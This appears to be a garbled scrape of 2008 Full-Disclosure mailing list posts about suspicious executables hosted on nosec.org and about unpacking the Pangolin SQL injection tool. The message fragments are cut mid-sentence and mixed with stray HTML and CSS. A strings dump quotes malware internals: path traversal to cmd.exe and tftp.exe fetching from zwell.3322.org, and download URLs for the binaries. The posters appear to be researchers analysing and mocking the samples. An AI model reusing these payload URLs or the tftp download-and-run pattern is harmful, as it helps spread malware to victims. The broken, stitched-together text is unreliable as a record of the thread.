Mike and the Twinkies,
You're a genius. To the other security twinkies that are very well
versed in strings analysis please get another job at the local
newspaper co.
So if it went clear through VirusTotal you would run it on your
machines? I'd be happy to provide a DumbassTotal service for all o
Just some interesting strings and such:
pdf_poc.exe:
http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1
..\\..\\..\\..\\windows\\system32\\cmd.exe
..\\..\\..\\..\\windows\\system32\\tftp.exe
-i zwell.3322.org
a.bat
Cpdf_poc.txt
Cpdf_poc.txt
Cpdf_poc.
http://www.nosec.org/web/files/demon.exe
http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3
http://www.nosec.org/web/files/pdf_poc.exe
http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559
http://www.nosec.org/web/files/zps.exe
http://www.virustotal.com/analisis/26d
Ok, you are right.
[EMAIL PROTECTED] ~ % wget http://www.nosec.org/web/index.txt
:(
--20:23:14-- http://www.nosec.org/web/index.txt
=> `index.txt'
Auflösen des Hostnamen »
Not yet.
C:\Users\Micheal\Research>wget http://www.nosec.org/web/index.txt
--15:12:52-- http://www.nosec.org/web/index.txt
=> `index.txt'
Resolving www.nosec.org... done.
Connecting to www.nosec.org[218.92.8.74]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13
With firefox - URL: *http://www.nosec.org/a.exe*
http://www.w3.org/TR/html4/strict.dtd";>
??
BODY { font: 9pt/12pt ?? }
H1 { font: 12pt/15pt ?? }
H2 { font: 9pt/12pt ?? }
A:link { color: red }
A:visited { color: maroon }
??
???:
?
Hi Folks,
Just out of curiosity, has anyone on this list already tried to reverse
engineer Pangolin's code?
Ricardo> Not me, although I did look at it. I thought great, kiddies
are going to love this > Sent from my BlackBerry® smartphone with
SprintSpeed > > -Original Messag
C:\Users\Micheal\Research>..\bin\upx\upx -d pangolin_bin\out\pangolin.exe
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007
UPX 3.02w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007
File size
Not me, although I did look at it. I thought great, kiddies are going to love
this
Sent from my BlackBerry® smartphone with SprintSpeed
-Original Message-
From: davidrook <[EMAIL PROTECTED]>
Date: Wed, 26 Mar 2008 17:23:03
To: Razi Shaban <[EMAIL PROTECTED]>
Cc:full-disclosure@lists.gr